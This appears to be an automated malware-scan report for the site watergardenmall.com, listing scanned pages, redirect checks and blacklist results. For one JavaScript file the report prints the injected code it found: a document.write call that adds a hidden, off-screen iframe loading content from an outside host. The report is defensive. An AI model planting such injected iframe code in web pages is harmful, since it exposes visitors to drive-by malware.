Scanned pages/files
Request | Server response | Status |
http://www.watergardenmall.com/ | 200 OK Content-Length: 5750 Content-Type: text/html | clean |
http://www.watergardenmall.com/media/system/js/caption.js | 200 OK Content-Length: 199 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) width="55"></iframe>');;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://www.watergardenmall.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL3d3dy53YXRlcmdhcmRlbm1hbGwuY29tL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTE6aG9tZSZJdGVtaWQ9MQ== | 200 OK Content-Length: 3762 Content-Type: text/html | clean |
http://www.watergardenmall.com/test404page.js | 404 Not Found Content-Length: 404 Content-Type: text/html | clean |
http://www.watergardenmall.com/index.php?option=com_content&view=article&id=1&Itemid=2 | 200 OK Content-Length: 5766 Content-Type: text/html | clean |
http://www.watergardenmall.com/index.php?option=com_content&view=article&id=2&Itemid=6 | 200 OK Content-Length: 5812 Content-Type: text/html | clean |
http://www.watergardenmall.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL3d3dy53YXRlcmdhcmRlbm1hbGwuY29tL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTI6bGlua3MmSXRlbWlkPTY= | 200 OK Content-Length: 3762 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: watergardenmall.com
Result:
GET / HTTP/1.1
Host: watergardenmall.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: watergardenmall.com
Referer: http://www.google.com/search?q=watergardenmall.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: watergardenmall.com
Referer: http://www.google.com/search?q=watergardenmall.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=watergardenmall.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://watergardenmall.com/
Result: watergardenmall.com is not infected or malware details are not published yet.
Result: watergardenmall.com is not infected or malware details are not published yet.